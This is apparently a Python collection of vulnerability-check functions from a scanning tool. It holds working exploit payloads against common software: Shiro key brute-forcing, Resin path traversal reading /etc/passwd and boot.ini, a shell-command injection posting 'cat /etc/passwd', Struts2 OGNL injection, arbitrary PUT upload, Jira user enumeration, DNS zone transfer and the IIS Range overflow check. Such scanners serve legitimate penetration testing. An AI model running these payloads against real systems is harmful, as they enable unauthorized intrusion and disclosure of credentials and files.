def verify(arg, **kwargs):
a = test_shiro(arg)
if a:
print("[!]Target {} Found Shiro".format(arg))
r1 = requests.get(arg,
cookies={'rememberMe': "123"},
proxies=PROXY,
timeout=10,
verify=False,
headers=headers,
allow_redirects=False)
res1 = len(str(r1.headers))
for key in keys:
print("[-] Brute key: {0}".format(key))
payload = CBCCipher(key, base64.b64decode(checkdata))
payload = payload.decode()
r2 = requests.get(arg,
cookies={'rememberMe': payload},
timeout=10,
proxies=PROXY,
verify=False,
headers=headers,
allow_redirects=False)
res2 = len(str(r2.headers))
if res1 != res2 and r2.status_code != 400:
print("[+] Found key!!!: {}".format(key))
save(arg, pocname, key)
return {"url": arg, "poc-name": pocname, "exploit": key}
else:
pass
else:
return None
def verify(arg, **kwargs):
try:
dnsResolver = dns.resolver.Resolver()
dnsResolver.timeout = 10
host = arg.replace("http://", "")
host = arg.replace("https://", "")
domain = host.split(":")[0]
ns = dnsResolver.query(domain, 'NS')
isVul = False
if ns:
for domain_dns in ns:
xfr = dns.query.xfr(str(domain_dns),
domain,
timeout=10,
lifetime=10)
if dns.zone.from_xfr(xfr):
isVul = True
#print('[+] dig @{} {} axfr'.format(domain_dns, domain))
save(domain, pocname, domain_dns)
return {
"url": domain,
"poc-name": pocname,
"exploit": domain_dns
}
if not isVul:
pass
else:
pass
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false"
try:
r = requests.get(url=arg + exploit, timeout=5)
if '{"users":{' in r.text:
save(arg, pocname, exploit)
return {"url": arg, "poc-name": pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/ ../web-inf/"
try:
r = requests.get(url=arg+exploit,headers=headers)
if "Directory of" in r.text and "resin" in r.text:
save(arg,pocname,exploit)
return {"url": arg, "poc-name":pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/resin-doc/viewfile/?contextpath=C:\&servletpath=&file=boot.ini"
try:
r = requests.get(url=arg+exploit,headers=headers)
if "disk" in r.text and "boot" in r.text:
save(arg,pocname,exploit)
return {"url": arg, "poc-name":pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/resin-doc/viewfile/?file=index.jsp"
try:
r = requests.get(url=arg + exploit, headers=headers)
if "<%@" in r.text and "resin" in r.text:
save(arg, pocname, exploit)
return {"url": arg, "poc-name": pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/.svn/all-wcprops"
try:
r = requests.get(url=arg + exploit, headers=headers, timeout=5)
if "svn:wc:ra_dav:version-url" in r.text:
save(arg, pocname, exploit)
return {"url": arg, "poc-name": pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/resin-doc/examples/jndi-appconfig/test?inputFile=/etc/passwd"
try:
r = requests.get(url=arg+exploit,headers=headers)
if "root:" in r.text and "/bin/bash" in r.text:
save(arg,pocname,exploit)
return {"url": arg, "poc-name":pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/secure/QueryComponent!Default.jspa"
try:
r = requests.get(url=arg + exploit, timeout=5, headers=headers)
if '''{"searchers":{"groups":[{"searchers":[{"name"''' in r.text:
save(arg, pocname, exploit)
return {"url": arg, "poc-name": pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/secure/ViewUserHover.jspa?username=vvoxyxzt"
try:
r = requests.get(url=arg + exploit, timeout=5, headers=headers)
if '''<a id="avatar-image-link" title="vvoxyxzt" href="/secure/ViewProfile.jspa?name=vvoxyxzt">''' in r.text:
save(arg, pocname, exploit)
return {"url": arg, "poc-name": pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/druid/index.html"
try:
r = requests.get(url=arg+exploit,headers=headers)
if "Druid Stat Index" in r.text:
save(arg,pocname,exploit)
return {"url": arg, "poc-name":pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/jmx-console/"
try:
r = requests.get(url=arg + exploit, headers=headers)
if 'JMImplementation' in r.text and 'JMX Agent View' in r.text and 'jboss.' in r.text:
save(arg, pocname, exploit)
return {"url": arg, "poc-name": pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/env"
try:
r = requests.get(url=arg+exploit,headers=headers,timeout=7)
if "spring.datasource" in r.text:
save(arg,pocname,exploit)
return {"url": arg, "poc-name":pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/webadm/?q=moni_detail.do&action=gragh"
data = "type='|cat /etc/passwd||'"
try:
r = requests.post(url=arg+exploit,headers=headers,data=data,timeout=7)
if "root:x" in r.text:
save(arg,pocname,exploit)
return {"url": arg, "poc-name":pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',40765*42539)}.multipart/form-data"
try:
r = requests.get(url=arg,headers=headers,allow_redirects=False)
#print(type(r.headers['x-res']))
if "1734102335" in r.headers['x-res']:
save(arg,pocname,exploit)
return {"url": arg, "poc-name":pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit1 = "/.idea/workspace.xml"
exploit2 = "/.idea/modules.xml"
exploit3 = "/.idea/"
try:
r1 = requests.get(url=arg + exploit3, headers=headers, timeout=5)
if "Directory: /.idea/" in r1.text:
save(arg, pocname, exploit3)
return {"url": arg, "poc-name": pocname, "exploit": exploit3}
except Exception as e:
pass
def verify(arg, **kwargs):
#port = 27017
host = arg.replace("http://", "")
host = arg.replace("https://", "")
ip = host.split(":")[0]
a = check_ldap(ip)
try:
if a:
save(arg, pocname, "389")
return {"url": host, "poc-name": pocname, "exploit": "389"}
except Exception as e:
pass
def bak(domain, file):
try:
r = requests.get(url=domain + file, headers=headers)
if r.status_code == 200 and "Content-Type" in r.headers and "application" in r.headers[
"Content-Type"]:
#global target
target = domain + file
save(domain, pocname, target)
print({"url": domain, "poc-name": pocname, "exploit": target})
#print(target)
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "/2222.txt"
data = "This is a test!"
try:
r = requests.put(url=arg+exploit,headers=headers,data=data,timeout=7)
r1 = requests.get(url=arg+exploit,headers=headers,timeout=5)
if "This is a test!" in r1.text:
save(arg,pocname,exploit)
requests.delete(url=arg+exploit)
return {"url": arg, "poc-name":pocname, "exploit": exploit}
except Exception as e:
pass
def verify(arg, **kwargs):
port = 27017
host = arg.replace("http://", "")
host = arg.replace("https://", "")
host = host.split(":")[0]
a = check_mongodb(host, port)
try:
if a:
save(arg, pocname, str(port))
return {"url": host, "poc-name": pocname, "exploit": str(port)}
except Exception as e:
pass
def verify(arg, **kwargs):
try:
a = requests.get(url=arg)
start = int(a.headers['Content-Length']) + 300
end = 0x8000000000000000 - start
headers = {"Range": "bytes=-{},-{}".format(start, end)}
res = requests.get(url=arg, headers=headers, stream=True, timeout=10)
ret = res.raw.read(500)
code = res.status_code
if code == 206:
save(arg, pocname, pocname)
return {"url": arg, "poc-name": pocname, "exploit": pocname}
except Exception as e:
pass
def verify(arg, **kwargs):
exploit = "upload type,the same as st2-045"
boundary = "---------------------------735323031399963166993862150"
paylaod = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-RES',40765*42539)}\x00b"
headers = {
'Content-Type': 'multipart/form-data; boundary=' + boundary + ''
}
data = "--" + boundary + "\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"" + paylaod + "\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--" + boundary + "--"
try:
r = requests.post(url=arg, headers=headers, data=data)
if "1734102335" in r.headers['x-res']:
save(arg, pocname, exploit)
return {"url": arg, "poc-name": pocname, "exploit": exploit}
except Exception as e:
pass
